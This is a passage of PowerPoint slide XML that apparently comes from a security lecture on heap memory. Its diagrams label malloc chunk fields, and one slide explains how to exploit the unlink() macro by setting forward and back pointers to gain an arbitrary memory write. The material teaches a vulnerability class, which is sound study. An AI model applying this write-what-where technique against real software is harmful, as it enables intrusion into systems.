            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304801" y="4400551"/>
            <a:ext cx="743037" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk Y</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085461" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="2171700"/>
            <a:ext cx="76200" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 166667"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085462" name="AutoShape 22"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="3371850"/>
            <a:ext cx="76200" cy="2343150"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 341667"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085463" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="21717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prev_size (not used here)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085464" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="24003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size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085465" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2628900"/>
            <a:ext cx="2362200" cy="6858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data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085466" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="33147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prev_size (not used here)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085467" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="35433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size, PREV_INUSE=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085469" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="2571751"/>
            <a:ext cx="745066" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085470" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648201" y="3714751"/>
            <a:ext cx="788873" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk W</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085471" name="AutoShape 31"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="2171700"/>
            <a:ext cx="76200" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 166667"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085472" name="AutoShape 32"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="3371850"/>
            <a:ext cx="76200" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 116667"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085473" name="Rectangle 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="37719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fd_w</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085474" name="Rectangle 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="40005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bk_w</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085475" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="42291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prev_size of W</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085476" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="44577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size, PREV_INUSE=0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085477" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="46863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fd_z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085478" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="49149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bk_z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085479" name="AutoShape 39"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="4286250"/>
            <a:ext cx="76200" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 116667"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085480" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724401" y="4514851"/>
            <a:ext cx="742962" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk Z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="645061855"/>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86466" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> macro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086467" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2171700"/>
            <a:ext cx="4267200" cy="3486150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>free(X) is called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>W is examined and Z is found using (W + W-&gt;size)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Z says that W is free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>unlink(W, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>fd_w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bk_w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) is called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fd_w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + 12) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bk_w</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>*(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bk_w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> + 8) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>fd_w</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>fd_w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> is set to the address to be overwritten - 12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bk_w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> is set to the value to be written</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086469" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="21717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prev_size (not used here)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086470" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="24003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size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086471" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2628900"/>
            <a:ext cx="2362200" cy="6858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data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086472" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="33147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prev_size (not used here)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086473" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="35433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size, PREV_INUSE=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086474" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="2571751"/>
            <a:ext cx="745066" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086475" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648201" y="3714751"/>
            <a:ext cx="788873" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk W</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086476" name="AutoShape 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="2171700"/>
            <a:ext cx="76200" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 166667"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086477" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="3371850"/>
            <a:ext cx="76200" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 116667"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086478" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="37719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fd_w</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086479" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="40005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bk_w</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086480" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="42291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prev_size of W</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086481" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="44577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size, PREV_INUSE=0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086482" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="46863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fd_z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086483" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
